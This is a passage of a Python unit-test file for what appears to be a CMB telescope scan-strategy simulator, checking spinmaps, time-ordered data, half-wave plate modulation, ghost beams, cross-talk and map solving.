scs.step_dict['remainder'] = 100 scs.reset_el_steps() self.assertEqual(scs.step_dict['step'], 0) self.assertEqual(scs.step_dict['remainder'], 0) for step in range(nsteps): el = next(scs.el_step_gen) self.assertEqual(el, step%5) scs.reset_el_steps() self.assertEqual(next(scs.el_step_gen), 0) self.assertEqual(next(scs.el_step_gen), 1) def test_init_detpair(self): ''' Check if spinmaps are correctly created. ''' mmax = 3 nside = 16 scs = ScanStrategy(duration=1, sample_rate=10) beam_a = Beam(fwhm=0., btype='Gaussian', mmax=mmax) beam_b = Beam(fwhm=0., btype='Gaussian', mmax=mmax) init_spinmaps_opts = dict(max_spin=5, nside_spin=nside) scs.init_detpair(self.alm, beam_a, beam_b=beam_b, **init_spinmaps_opts) # We expect a spinmaps attribute (dict) with # main_beam key that contains a list of [func, func_c] # where func has shape (mmax + 1, 12nside**2) and # func_c has shape (2 mmax + 1, 12nside**2). # We expect an empty list for the ghosts. # Note empty lists evaluate to False self.assertFalse(scs.spinmaps['ghosts']) func = scs.spinmaps['main_beam']['s0a0']['maps'] func_c = scs.spinmaps['main_beam']['s2a4']['maps'] self.assertEqual(func.shape, (mmax + 1, 12 * nside ** 2)) self.assertEqual(func_c.shape, (2 * mmax + 1, 12 * nside ** 2)) # Since we have a infinitely narrow Gaussian the convolved # maps should just match the input (up to healpix quadrature # wonkyness). input_map = hp.alm2map(self.alm, nside, verbose=False) # I, Q, U zero_map = np.zeros_like(input_map[0]) np.testing.assert_array_almost_equal(input_map[0], func[0], decimal=6) # s = 2 Pol map should be Q \pm i U np.testing.assert_array_almost_equal(input_map[1] + 1j * input_map[2], func_c[mmax + 2], decimal=6) # Test if rest of maps are zero. for i in range(1, mmax + 1): np.testing.assert_array_almost_equal(zero_map, func[i], decimal=6) for i in range(1, 2 * mmax + 1): if i == mmax + 2: continue print(i) np.testing.assert_array_almost_equal(zero_map, func_c[i], decimal=6) def test_init_detpair2(self): ''' Check if function works with only A beam. ''' mmax = 3 nside = 16 scs = ScanStrategy(duration=1, sample_rate=10) beam_a = Beam(fwhm=0., btype='Gaussian', mmax=mmax) beam_b = None init_spinmaps_opts = dict(max_spin=5, nside_spin=nside) scs.init_detpair(self.alm, beam_a, beam_b=beam_b, **init_spinmaps_opts) # Test for correct shapes. # Note empty lists evaluate to False self.assertFalse(scs.spinmaps['ghosts']) func = scs.spinmaps['main_beam']['s0a0']['maps'] func_c = scs.spinmaps['main_beam']['s2a4']['maps'] self.assertEqual(func.shape, (mmax + 1, 12 * nside ** 2)) self.assertEqual(func_c.shape, (2 * mmax + 1, 12 * nside ** 2)) def test_scan_spole(self): ''' Perform a (low resolution) scan and see if TOD make sense. ''' mlen = 10 * 60 rot_period = 120 mmax = 2 ra0=-10 dec0=-57.5 fwhm = 200 nside = 128 az_throw = 10 polang = 20. ces_opts = dict(ra0=ra0, dec0=dec0, az_throw=az_throw, scan_speed=2.) scs = ScanStrategy(duration=mlen, sample_rate=10, location='spole') # Create a 1 x 1 square grid of Gaussian beams. scs.create_focal_plane(nrow=1, ncol=1, fov=4, lmax=self.lmax, fwhm=fwhm, polang=polang) beam = scs.beams[0][0] scs.init_detpair(self.alm, beam, nside_spin=nside, max_spin=mmax) scs.partition_mission() chunk = scs.chunks[0] ces_opts.update(chunk) # Populate boresight. scs.constant_el_scan(**ces_opts) # Test without returning anything (default behaviour). scs.scan(beam, **chunk) tod = scs.scan(beam, return_tod=True, **chunk) self.assertEqual(tod.size, chunk['end'] - chunk['start']) pix, nside_out, pa, hwp_ang = scs.scan(beam, return_point=True, **chunk) self.assertEqual(pix.size, tod.size) self.assertEqual(nside, nside_out) self.assertEqual(pa.size, tod.size) self.assertEqual(hwp_ang, 0) # Turn on HWP scs.set_hwp_mod(mode='continuous', freq=1., start_ang=0) scs.rotate_hwp(**chunk) tod2, pix2, nside_out2, pa2, hwp_ang2 = scs.scan(beam, return_tod=True, return_point=True, **chunk) np.testing.assert_almost_equal(pix, pix2) np.testing.assert_almost_equal(pix, pix2) np.testing.assert_almost_equal(pa, pa2) self.assertTrue(np.any(np.not_equal(tod, tod2)), True) self.assertEqual(nside_out, nside_out2) self.assertEqual(hwp_ang2.size, tod.size) # Construct TOD manually. polang = beam.polang maps_sm = np.asarray(hp.alm2map(self.alm, nside, verbose=False, fwhm=np.radians(beam.fwhm / 60.))) np.testing.assert_almost_equal(maps_sm[0], scs.spinmaps['main_beam']['s0a0']['maps'][0]) q = np.real(scs.spinmaps['main_beam']['s2a4']['maps'][mmax + 2]) u = np.imag(scs.spinmaps['main_beam']['s2a4']['maps'][mmax + 2]) np.testing.assert_almost_equal(maps_sm[1], q) np.testing.assert_almost_equal(maps_sm[2], u) tod_man = maps_sm[0][pix] tod_man += (maps_sm[1][pix] \ * np.cos(2 * np.radians(pa - polang - 2 * hwp_ang2))) tod_man += (maps_sm[2][pix] \ * np.sin(2 * np.radians(pa - polang - 2 * hwp_ang2))) np.testing.assert_almost_equal(tod2, tod_man) def test_scan_spole_pol(self): ''' Perform a (low resolution) pol only scan and see if TOD make sense. ''' alm = (self.alm[0] * 0, self.alm[1], self.alm[2]) mlen = 10 * 60 rot_period = 120 mmax = 2 ra0=-10 dec0=-57.5 fwhm = 200 nside = 128 az_throw = 10 polang = 20. ces_opts = dict(ra0=ra0, dec0=dec0, az_throw=az_throw, scan_speed=2.) scs = ScanStrategy(duration=mlen, sample_rate=10, location='spole') # Create a 1 x 1 square grid of Gaussian beams. scs.create_focal_plane(nrow=1, ncol=1, fov=4, lmax=self.lmax, fwhm=fwhm, polang=polang) beam = scs.beams[0][0] scs.init_detpair(alm, beam, nside_spin=nside, max_spin=mmax) scs.partition_mission() chunk = scs.chunks[0] ces_opts.update(chunk) # Populate boresight. scs.constant_el_scan(**ces_opts) # Test without returning anything (default behaviour). scs.scan(beam, **chunk) tod = scs.scan(beam, return_tod=True, **chunk) self.assertEqual(tod.size, chunk['end'] - chunk['start']) pix, nside_out, pa, hwp_ang = scs.scan(beam, return_point=True, **chunk) self.assertEqual(pix.size, tod.size) self.assertEqual(nside, nside_out) self.assertEqual(pa.size, tod.size) self.assertEqual(hwp_ang, 0) # Turn on HWP scs.set_hwp_mod(mode='continuous', freq=1., start_ang=0) scs.rotate_hwp(**chunk) tod2, pix2, nside_out2, pa2, hwp_ang2 = scs.scan(beam, return_tod=True, return_point=True, **chunk) np.testing.assert_almost_equal(pix, pix2) np.testing.assert_almost_equal(pix, pix2) np.testing.assert_almost_equal(pa, pa2) self.assertTrue(np.any(np.not_equal(tod, tod2)), True) self.assertEqual(nside_out, nside_out2) self.assertEqual(hwp_ang2.size, tod.size) # Construct TOD manually. polang = beam.polang maps_sm = np.asarray(hp.alm2map(alm, nside, verbose=False, fwhm=np.radians(beam.fwhm / 60.))) np.testing.assert_almost_equal(maps_sm[0], scs.spinmaps['main_beam']['s0a0']['maps'][0]) q = np.real(scs.spinmaps['main_beam']['s2a4']['maps'][mmax + 2]) u = np.imag(scs.spinmaps['main_beam']['s2a4']['maps'][mmax + 2]) np.testing.assert_almost_equal(maps_sm[1], q) np.testing.assert_almost_equal(maps_sm[2], u) tod_man = maps_sm[0][pix] tod_man += (maps_sm[1][pix] \ * np.cos(2 * np.radians(pa - polang - 2 * hwp_ang2))) tod_man += (maps_sm[2][pix] \ * np.sin(2 * np.radians(pa - polang - 2 * hwp_ang2))) np.testing.assert_almost_equal(tod2, tod_man) def test_scan_spole_bin(self): ''' Perform a (low resolution) scan, bin and compare to input. ''' mlen = 10 * 60 rot_period = 120 mmax = 2 ra0=-10 dec0=-57.5 fwhm = 200 nside = 128 az_throw = 10 scs = ScanStrategy(duration=mlen, sample_rate=10, location='spole') # Create a 1 x 2 square grid of Gaussian beams. scs.create_focal_plane(nrow=1, ncol=2, fov=4, lmax=self.lmax, fwhm=fwhm) # Allocate and assign parameters for mapmaking. scs.allocate_maps(nside=nside) # set instrument rotation. scs.set_instr_rot(period=rot_period, angles=[68, 113, 248, 293]) # Set elevation stepping. scs.set_el_steps(rot_period, steps=[0, 2, 4]) # Set HWP rotation. scs.set_hwp_mod(mode='continuous', freq=3.) # Generate timestreams, bin them and store as attributes. scs.scan_instrument_mpi(self.alm, verbose=0, ra0=ra0, dec0=dec0, az_throw=az_throw, scan_speed=2., nside_spin=nside, max_spin=mmax) # Solve for the maps. maps, cond = scs.solve_for_map(fill=np.nan) alm = hp.smoothalm(self.alm, fwhm=np.radians(fwhm/60.), verbose=False) maps_raw = np.asarray(hp.alm2map(self.alm, nside, verbose=False)) cond[~np.isfinite(cond)] = 10 np.testing.assert_array_almost_equal(maps_raw[0,cond<2.5], maps[0,cond<2.5], decimal=10) np.testing.assert_array_almost_equal(maps_raw[1,cond<2.5], maps[1,cond<2.5], decimal=10) np.testing.assert_array_almost_equal(maps_raw[2,cond<2.5], maps[2,cond<2.5], decimal=10) def test_scan_ghosts(self): ''' Perform a (low resolution) scan with two detectors, compare to detector + ghost. ''' mlen = 10 * 60 rot_period = 120 mmax = 2 ra0=-10 dec0=-57.5 fwhm = 200 nside = 128 az_throw = 10 scs = ScanStrategy(duration=mlen, sample_rate=10, location='spole') # Create two Gaussian (main) beams. beam_opts = dict(az=0, el=0, polang=0, fwhm=fwhm, lmax=self.lmax, symmetric=True) ghost_opts = dict(az=-4, el=10, polang=34, fwhm=fwhm, lmax=self.lmax, symmetric=True, amplitude=0.1) scs.add_to_focal_plane(Beam(**beam_opts)) scs.add_to_focal_plane(Beam(**ghost_opts)) # Allocate and assign parameters for mapmaking. scs.allocate_maps(nside=nside) # Set HWP rotation. scs.set_hwp_mod(mode='continuous', freq=3.) # Generate timestreams, bin them and store as attributes. scs.scan_instrument_mpi(self.alm, verbose=0, ra0=ra0, dec0=dec0, az_throw=az_throw, scan_speed=2., binning=False, nside_spin=nside, max_spin=mmax, save_tod=True) tod = scs.data(scs.chunks[0], beam=scs.beams[0][0], data_type='tod') tod += scs.data(scs.chunks[0], beam=scs.beams[1][0], data_type='tod') tod = tod.copy() # Repeat with single beam + ghost. scs.remove_from_focal_plane(scs.beams[1][0]) scs.beams[0][0].create_ghost(**ghost_opts) scs.reset_hwp_mod() scs.scan_instrument_mpi(self.alm, verbose=0, ra0=ra0, dec0=dec0, az_throw=az_throw, scan_speed=2., binning=False, nside_spin=nside, max_spin=mmax, save_tod=True) tod_w_ghost = scs.data(scs.chunks[0], beam=scs.beams[0][0], data_type='tod') # Sum TOD of two beams must match TOD of single beam + ghost. np.testing.assert_array_almost_equal(tod, tod_w_ghost, decimal=10) def test_scan_ghosts_map(self): ''' Perform a (low resolution) scan with two detectors, compare map to detector + ghost. ''' mlen = 10 * 60 rot_period = 120 mmax = 2 ra0=-10 dec0=-57.5 fwhm = 200 nside = 128 az_throw = 10 scs = ScanStrategy(duration=mlen, sample_rate=10, location='spole') # Create two Gaussian (main) beams. beam_opts = dict(az=0, el=0, polang=28, fwhm=fwhm, lmax=self.lmax, symmetric=True) ghost_opts = dict(az=0, el=0, polang=28, fwhm=fwhm, lmax=self.lmax, symmetric=True, amplitude=1) scs.add_to_focal_plane(Beam(**beam_opts)) scs.add_to_focal_plane(Beam(**ghost_opts)) # Allocate and assign parameters for mapmaking. scs.allocate_maps(nside=nside) # Set HWP rotation. scs.set_hwp_mod(mode='continuous', freq=3.) # Generate timestreams, bin them and store as attributes. scs.scan_instrument_mpi(self.alm, verbose=0, ra0=ra0, dec0=dec0, az_throw=az_throw, scan_speed=2., binning=False, nside_spin=nside, max_spin=mmax, save_tod=True) tod = scs.data(scs.chunks[0], beam=scs.beams[0][0], data_type='tod') tod += scs.data(scs.chunks[0], beam=scs.beams[1][0], data_type='tod') tod = tod.copy() # Solve for the maps. maps, cond = scs.solve_for_map(fill=np.nan) # To supress warnings cond[~np.isfinite(cond)] = 10 # Repeat with single beam + ghost. scs.remove_from_focal_plane(scs.beams[1][0]) scs.beams[0][0].create_ghost(**ghost_opts) scs.reset_hwp_mod() scs.scan_instrument_mpi(self.alm, verbose=0, ra0=ra0, dec0=dec0, az_throw=az_throw, scan_speed=2., binning=False, nside_spin=nside, max_spin=mmax, save_tod=True) tod_w_ghost = scs.data(scs.chunks[0], beam=scs.beams[0][0], data_type='tod') # Sum TOD of two beams must match TOD of single beam + ghost. np.testing.assert_array_almost_equal(tod, tod_w_ghost, decimal=10) # Maps must match. maps_w_ghost, cond_w_ghost = scs.solve_for_map(fill=np.nan) # To supress warnings cond_w_ghost[~np.isfinite(cond_w_ghost)] = 10 np.testing.assert_array_almost_equal(maps[0,cond<2.5], maps_w_ghost[0,cond_w_ghost<2.5], decimal=10) np.testing.assert_array_almost_equal(maps[1,cond<2.5], maps_w_ghost[1,cond_w_ghost<2.5], decimal=10) np.testing.assert_array_almost_equal(maps[2,cond<2.5], maps_w_ghost[2,cond_w_ghost<2.5], decimal=10) def test_cross_talk(self): '''Test if the cross-talk is performing as it should.''' mlen = 10 * 60 rot_period = 120 mmax = 2 ra0=-10 dec0=-57.5 fwhm = 200 nside = 128 az_throw = 10 scs = ScanStrategy(duration=mlen, sample_rate=10, location='spole') # Single pair. scs.create_focal_plane(nrow=1, ncol=1, fov=0, lmax=self.lmax, fwhm=fwhm) # Allocate and assign parameters for mapmaking. scs.allocate_maps(nside=nside) # set instrument rotation. scs.set_instr_rot(period=rot_period, angles=[12, 14, 248, 293]) # Set elevation stepping. scs.set_el_steps(rot_period, steps=[0, 2, 4, 8, 10]) # Set HWP rotation. scs.set_hwp_mod(mode='stepped', freq=3.) beam_a, beam_b = scs.beams[0] scs.init_detpair(self.alm, beam_a, beam_b=beam_b, nside_spin=nside) # Generate timestreams, bin them and store as attributes. scs.scan_instrument_mpi(self.alm, verbose=0, ra0=ra0, dec0=dec0, az_throw=az_throw, scan_speed=2., max_spin=mmax, reuse_spinmaps=True, save_tod=True, binning=False, ctalk=0.0) tod_a = scs.data(scs.chunks[0], beam=beam_a, data_type='tod').copy() tod_b = scs.data(scs.chunks[0], beam=beam_b, data_type='tod').copy() # Redo with cross-talk ctalk = 0.5 scs.reset_instr_rot() scs.reset_hwp_mod() scs.reset_el_steps() scs.scan_instrument_mpi(self.alm, verbose=0, ra0=ra0, dec0=dec0, az_throw=az_throw, scan_speed=2., max_spin=mmax, reuse_spinmaps=True, save_tod=True, binning=False, ctalk=ctalk) tod_ac = scs.data(scs.chunks[0], beam=beam_a, data_type='tod') tod_bc = scs.data(scs.chunks[0], beam=beam_b, data_type='tod') np.testing.assert_array_almost_equal(tod_ac, tod_a + ctalk * tod_b) np.testing.assert_array_almost_equal(tod_bc, tod_b + ctalk * tod_a) # Redo with less cross-talk ctalk = 0.000001 scs.reset_instr_rot() scs.reset_hwp_mod() scs.reset_el_steps() scs.scan_instrument_mpi(self.alm, verbose=0, ra0=ra0, dec0=dec0, az_throw=az_throw, scan_speed=2., max_spin=mmax, reuse_spinmaps=True, save_tod=True, binning=False, ctalk=ctalk) tod_acs = scs.data(scs.chunks[0], beam=beam_a, data_type='tod') tod_bcs = scs.data(scs.chunks[0], beam=beam_b, data_type='tod') np.testing.assert_array_almost_equal(tod_acs, tod_a + ctalk * tod_b) np.testing.assert_array_almost_equal(tod_bcs, tod_b + ctalk * tod_a) np.testing.assert_raises(AssertionError, np.testing.assert_array_equal, tod_ac, tod_acs) np.testing.assert_raises(AssertionError, np.testing.assert_array_equal, tod_bc, tod_bcs) def test_interpolate(self): ''' Compare interpolated TOD to default for extremely bandlimited input such that should agree relatively well. ''' mlen = 60 mmax = 2 ra0=-10 dec0=-57.5 fwhm = 10 * 60 nside = 256 az_throw = 10 scs = ScanStrategy(duration=mlen, sample_rate=10, location='spole') # Create a 1 x 1 square grid of Gaussian beams. scs.create_focal_plane(nrow=1, ncol=1, fov=4, lmax=self.lmax, fwhm=fwhm) # Generate timestreams, bin them and store as attributes. scs.scan_instrument_mpi(self.alm, verbose=0, ra0=ra0, dec0=dec0, az_throw=az_throw, scan_speed=2., nside_spin=nside, max_spin=mmax, binning=False) tod_raw = scs.tod.copy() scs.scan_instrument_mpi(self.alm, verbose=0, ra0=ra0, dec0=dec0, az_throw=az_throw, scan_speed=2., nside_spin=nside, max_spin=mmax, reuse_spinmaps=False, interp=True, binning=False) np.testing.assert_array_almost_equal(tod_raw, scs.tod, decimal=0) def test_chunks(self): '''Test the _chunk2idx function. ''' mlen = 100 # so 1000 samples chunksize = 30 rot_period = 1.2 # Note, seconds. scs = ScanStrategy(duration=mlen, sample_rate=10) scs.partition_mission(chunksize=chunksize) self.assertEqual(len(scs.chunks), int(np.ceil(scs.nsamp / float(chunksize)))) # Take single chunk and subdivide it and check whether we # can correctly access a chunk-sized array. scs.set_instr_rot(period=rot_period) for chunk in scs.chunks: scs.rotate_instr() subchunks = scs.subpart_chunk(chunk) chunklen = chunk['end'] - chunk['start'] # Start with zero array, let every subchunk add ones # to its slice, then test if resulting array is one # everywhere. arr = np.zeros(chunklen, dtype=int) for subchunk in subchunks: self.assertEqual(subchunk['cidx'], chunk['cidx']) self.assertTrue(subchunk['start'] >= chunk['start']) self.assertTrue(subchunk['end'] <= chunk['end']) qidx_start, qidx_end = scs._chunk2idx(**subchunk) arr[qidx_start:qidx_end] += 1 np.testing.assert_array_equal(arr, np.ones_like(arr)) def test_preview_pointing_input(self): # Test if scan_instrument_mpi works with preview_pointing # option set. scs = ScanStrategy(duration=1, sample_rate=10, location='spole') # Should raise error if alm is None with preview_pointing not set. alm = None with self.assertRaises(TypeError): scs.scan_instrument_mpi(alm, verbose=0, preview_pointing=False) # Should not raise error if alm is provided and preview_pointing set. alm = self.alm scs.scan_instrument_mpi(alm, verbose=0, preview_pointing=True) def test_preview_pointing(self): # With preview_pointing set, expect correct proj matrix, # but vec vector should be zero. mlen = 6 * 60 rot_period = 30 step_period = rot_period * 2 mmax = 2 ra0=-10 dec0=-57.5 fwhm = 10 nside_out = 32 az_throw = 10 scan_speed = 2 # deg / s. scs = ScanStrategy(duration=mlen, sample_rate=10, location='spole') # Create a 1 x 2 square grid of Gaussian beams. scs.create_focal_plane(nrow=1, ncol=2, fov=2, lmax=self.lmax, fwhm=fwhm) # Allocate and assign parameters for mapmaking. scs.allocate_maps(nside=nside_out) # set instrument rotation. scs.set_instr_rot(period=rot_period, angles=[68, 113, 248, 293]) # Set elevation stepping. scs.set_el_steps(step_period, steps=[0, 1, 2]) # Set HWP rotation. scs.set_hwp_mod(mode='continuous', freq=3.) # First run with preview_pointing set alm = None preview_pointing = True # Generate timestreams, bin them and store as attributes. scs.scan_instrument_mpi(alm, verbose=0, ra0=ra0, dec0=dec0, az_throw=az_throw, scan_speed=scan_speed, nside_spin=nside_out, max_spin=mmax, preview_pointing=preview_pointing) # Vec should be zero np.testing.assert_array_equal(scs.vec, np.zeros((3, 12 * nside_out ** 2))) # Save for comparison vec_prev = scs.vec proj_prev = scs.proj # Now run again in default way. # Create new dest arrays. scs.allocate_maps(nside=nside_out) scs.reset_instr_rot() scs.reset_hwp_mod() scs.reset_el_steps() alm = self.alm preview_pointing = False # Generate timestreams, bin them and store as attributes. scs.scan_instrument_mpi(alm, verbose=0, ra0=ra0, dec0=dec0, az_throw=az_throw, scan_speed=scan_speed, nside_spin=nside_out, max_spin=mmax, preview_pointing=preview_pointing) # Vec should not be zero now. np.testing.assert_equal(np.any(scs.vec), True) # Proj should be identical. np.testing.assert_array_almost_equal(scs.proj, proj_prev, decimal=9) # Run one more time with a ghost. Ghost should not change proj. # Create new dest arrays. scs.allocate_maps(nside=nside_out) alm = self.alm preview_pointing = False scs.reset_instr_rot() scs.reset_hwp_mod() scs.reset_el_steps() ghost_opts = dict(az=10, el=10, polang=28, fwhm=fwhm, lmax=self.lmax, symmetric=True, amplitude=1) scs.beams[0][0].create_ghost(**ghost_opts) # Generate timestreams, bin them and store as attributes. scs.scan_instrument_mpi(alm, verbose=0, ra0=ra0, dec0=dec0, az_throw=az_throw, scan_speed=scan_speed, nside_spin=nside_out, max_spin=mmax, preview_pointing=preview_pointing) # Vec should not be zero now. np.testing.assert_equal(np.any(scs.vec), True) # Proj should be identical. np.testing.assert_array_almost_equal(scs.proj, proj_prev, decimal=9) def test_offset_beam(self): mlen = 20 # mission length sample_rate = 10 location='spole' lmax = self.lmax fwhm = 300 nside_spin = 256 polang = 30 az_off = 20 el_off = 40 ss = ScanStrategy(mlen, sample_rate=sample_rate, location=location) # Create single detector. ss.create_focal_plane(nrow=1, ncol=1, fov=0, no_pairs=True, polang=polang, lmax=lmax, fwhm=fwhm) # Move detector away from boresight. ss.beams[0][0].az = az_off ss.beams[0][0].el = el_off # Start instrument rotated. rot_period = ss.mlen ss.set_instr_rot(period=rot_period, start_ang=45) ss.set_hwp_mod(mode='stepped', freq=1/20., start_ang=45, angles=[34, 12, 67]) ss.partition_mission() ss.scan_instrument_mpi(self.alm, binning=False, nside_spin=nside_spin, max_spin=2, interp=True) # Store the tod and pixel indices made with symmetric beam. tod_sym = ss.tod.copy() # Now repeat with asymmetric beam and no detector offset. # Set offsets to zero such that tods are generated using # only the boresight pointing. ss.beams[0][0].az = 0 ss.beams[0][0].el = 0 ss.beams[0][0].polang = 0 # Convert beam spin modes to E and B modes and rotate them # create blm again, scan_instrument_mpi detetes blms when done ss.beams[0][0].gen_gaussian_blm() blm = ss.beams[0][0].blm blmI = blm[0].copy() blmE, blmB = tools.spin2eb(blm[1], blm[2]) # Rotate blm to match centroid. # Note that rotate_alm uses the ZYZ euler convention. # Note that we include polang here as first rotation. q_off = ss.det_offset(az_off, el_off, polang) ra, dec, pa = ss.quat2radecpa(q_off) # We need to to apply these changes to the angles. phi = np.radians(ra) theta = np.radians(90 - dec) psi = np.radians(-pa) # rotate blm hp.rotate_alm([blmI, blmE, blmB], psi, theta, phi, lmax=lmax, mmax=lmax) # convert beam coeff. back to spin representation. blmm2, blmp2 = tools.eb2spin(blmE, blmB) ss.beams[0][0].blm = (blmI, blmm2, blmp2) ss.reset_instr_rot() ss.reset_hwp_mod() ss.scan_instrument_mpi(self.alm, binning=False, nside_spin=nside_spin, max_spin=lmax, interp=True) # TODs must agree at least at 2% per sample. np.testing.assert_equal(np.abs(ss.tod - tod_sym) < 0.02 * np.std(tod_sym), np.full(tod_sym.size, True)) def test_offset_beam_pol(self): mlen = 20 # mission length sample_rate = 10 location='spole' lmax = self.lmax fwhm = 300 nside_spin = 256 #polang = 30 #az_off = 20 #el_off = 40 polang = 90 az_off = 20 el_off = 0 alm = (self.alm[0]*0., self.alm[1], self.alm[2]) ss = ScanStrategy(mlen, sample_rate=sample_rate, location=location) # Create single detector. ss.create_focal_plane(nrow=1, ncol=1, fov=0, no_pairs=True, polang=polang, lmax=lmax, fwhm=fwhm) # Move detector away from boresight. ss.beams[0][0].az = az_off ss.beams[0][0].el = el_off # Start instrument rotated. rot_period = ss.mlen ss.set_instr_rot(period=rot_period, start_ang=45) #ss.set_hwp_mod(mode='stepped', freq=1/20., start_ang=45, # angles=[34, 12, 67]) ss.partition_mission() ss.scan_instrument_mpi(alm, binning=False, nside_spin=nside_spin, max_spin=2, interp=True) # Store the tod and pixel indices made with symmetric beam. tod_sym = ss.tod.copy() # Now repeat with asymmetric beam and no detector offset. # Set offsets to zero such that tods are generated using # only the boresight pointing. ss.beams[0][0].az = 0 ss.beams[0][0].el = 0 ss.beams[0][0].polang = 0 # Convert beam spin modes to E and B modes and rotate them # create blm again, scan_instrument_mpi detetes blms when done ss.beams[0][0].gen_gaussian_blm() blm = ss.beams[0][0].blm blmI = blm[0].copy() blmE, blmB = tools.spin2eb(blm[1], blm[2]) # Rotate blm to match centroid. # Note that rotate_alm uses the ZYZ euler convention. # Note that we include polang here as first rotation. q_off = ss.det_offset(az_off, el_off, polang) ra, dec, pa = ss.quat2radecpa(q_off) # We need to to apply these changes to the angles. phi = np.radians(ra) theta = np.radians(90 - dec) psi = np.radians(-pa) print('angles', psi, theta, phi) # rotate blm hp.rotate_alm([blmI, blmE, blmB], psi, theta, phi, lmax=lmax, mmax=lmax) # convert beam coeff. back to spin representation. blmm2, blmp2 = tools.eb2spin(blmE, blmB) ss.beams[0][0].blm = (blmI, blmm2, blmp2) ss.reset_instr_rot() ss.reset_hwp_mod() ss.scan_instrument_mpi(alm, binning=False, nside_spin=nside_spin, max_spin=lmax, interp=True) # TODs must agree at least at 2% per sample. print('tod_sym', tod_sym[::10]) print('ss.tod', ss.tod[::10]) np.testing.assert_equal(np.abs(ss.tod - tod_sym) < 0.02 * np.std(tod_sym), np.full(tod_sym.size, True)) def test_offset_beam_I(self): mlen = 20 # mission length sample_rate = 10 location='spole' lmax = self.lmax fwhm = 300 nside_spin = 256 polang = 30 az_off = 20 el_off = 40 alm = (self.alm[0], self.alm[1] * 0., self.alm[2] * 0.) ss = ScanStrategy(mlen, sample_rate=sample_rate, location=location) # Create single detector. ss.create_focal_plane(nrow=1, ncol=1, fov=0, no_pairs=True, polang=polang, lmax=lmax, fwhm=fwhm) # Move detector away from boresight. ss.beams[0][0].az = az_off ss.beams[0][0].el = el_off # Start instrument rotated. rot_period = ss.mlen ss.set_instr_rot(period=rot_period, start_ang=45) ss.set_hwp_mod(mode='stepped', freq=1/20., start_ang=45, angles=[34, 12, 67]) ss.partition_mission() ss.scan_instrument_mpi(alm, binning=False, nside_spin=nside_spin, max_spin=2, interp=True) # Store the tod and pixel indices made with symmetric beam. tod_sym = ss.tod.copy() # Now repeat with asymmetric beam and no detector offset. # Set offsets to zero such that tods are generated using # only the boresight pointing. ss.beams[0][0].az = 0 ss.beams[0][0].el = 0 ss.beams[0][0].polang = 0 # Convert beam spin modes to E and B modes and rotate them # create blm again, scan_instrument_mpi detetes blms when done ss.beams[0][0].gen_gaussian_blm() blm = ss.beams[0][0].blm blmI = blm[0].copy() blmE, blmB = tools.spin2eb(blm[1], blm[2]) # Rotate blm to match centroid. # Note that rotate_alm uses the ZYZ euler convention. # Note that we include polang here as first rotation. q_off = ss.det_offset(az_off, el_off, polang) ra, dec, pa = ss.quat2radecpa(q_off) # We need to to apply these changes to the angles. phi = np.radians(ra) theta = np.radians(90 - dec) psi = np.radians(-pa) # rotate blm hp.rotate_alm([blmI, blmE, blmB], psi, theta, phi, lmax=lmax, mmax=lmax) # convert beam coeff. back to spin representation. blmm2, blmp2 = tools.eb2spin(blmE, blmB) ss.beams[0][0].blm = (blmI, blmm2, blmp2) ss.reset_instr_rot() ss.reset_hwp_mod() ss.scan_instrument_mpi(alm, binning=False, nside_spin=nside_spin, max_spin=lmax, interp=True) # TODs must agree at least at 2% per sample. np.testing.assert_equal(np.abs(ss.tod - tod_sym) < 0.02 * np.std(tod_sym), np.full(tod_sym.size, True)) def test_spinmaps_complex(self): # Test if spinmaps_complex returns to spinmaps_real # in case where sky and beam B-modes are zero. def rand_alm(lmax): alm = np.empty(hp.Alm.getsize(lmax), dtype=np.complex128) alm[:] = np.random.randn(hp.Alm.getsize(lmax)) alm += 1j * np.random.randn(hp.Alm.getsize(lmax)) # Make m=0 modes real. alm[:lmax+1] = np.real(alm[:lmax+1]) return alm lmax = 10 almE, almB = tuple([rand_alm(lmax) for i in range(2)]) blmE, blmB = tuple([rand_alm(lmax) for i in range(2)]) spin_values = [-5, -4, -3, -2, -1, 0, 1, 2, 3, 4, 5] nside = 32 spinmaps = ScanStrategy._spinmaps_complex(almE, almB*0, blmE, blmB*0, spin_values, nside) for spin in range(6): sidx_pos = spin + 5 sidx_neg = 5 - spin np.testing.assert_almost_equal(spinmaps[sidx_pos], np.conj(spinmaps[sidx_neg])) def test_init_spinmaps_old_new(self): # Test if spinmaps with are consistent between old and new # implementation of HWP. def rand_alm(lmax): alm = np.empty(hp.Alm.getsize(lmax), dtype=np.complex128) alm[:] = np.random.randn(hp.Alm.getsize(lmax)) alm += 1j * np.random.randn(hp.Alm.getsize(lmax)) # Make m=0 modes real. alm[:lmax+1] = np.real(alm[:lmax+1]) return alm lmax = 4 alm = tuple([rand_alm(lmax) for i in range(3)]) blmI = np.array([0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], dtype=np.complex128) blmm2 = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0], dtype=np.complex128) blmp2 = np.zeros_like(blmm2) blm = (blmI, blmm2, blmp2) nside = 32 max_spin = 3 spinmaps_old = ScanStrategy._init_spinmaps(alm, blm, max_spin, nside, symmetric=False, hwp_mueller=None) hwp_mueller = np.asarray([[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, -1, 0], [0, 0, 0, -1]]) spinmaps_new = ScanStrategy._init_spinmaps(alm, blm, max_spin, nside, symmetric=False, hwp_mueller=hwp_mueller) np.testing.assert_almost_equal(spinmaps_old['s0a0']['maps'], spinmaps_new['s0a0']['maps']) zero_map = np.zeros(hp.nside2npix(nside)) np.testing.assert_almost_equal(spinmaps_old['s2a4']['maps'][0], zero_map) np.testing.assert_almost_equal(spinmaps_old['s2a4']['maps'][1], zero_map) np.testing.assert_almost_equal(spinmaps_old['s2a4']['maps'][2], zero_map) np.testing.assert_almost_equal(spinmaps_old['s2a4']['maps'][3], zero_map) np.testing.assert_almost_equal(spinmaps_old['s2a4']['maps'][4], zero_map) np.testing.assert_almost_equal(spinmaps_old['s2a4']['maps'][6], zero_map) np.testing.assert_almost_equal(spinmaps_new['s2a4']['maps'][0], zero_map) np.testing.assert_almost_equal(spinmaps_new['s2a4']['maps'][1], zero_map) np.testing.assert_almost_equal(spinmaps_new['s2a4']['maps'][2], zero_map) np.testing.assert_almost_equal(spinmaps_new['s2a4']['maps'][3], zero_map) np.testing.assert_almost_equal(spinmaps_new['s2a4']['maps'][4], zero_map) np.testing.assert_almost_equal(spinmaps_new['s2a4']['maps'][6], zero_map) 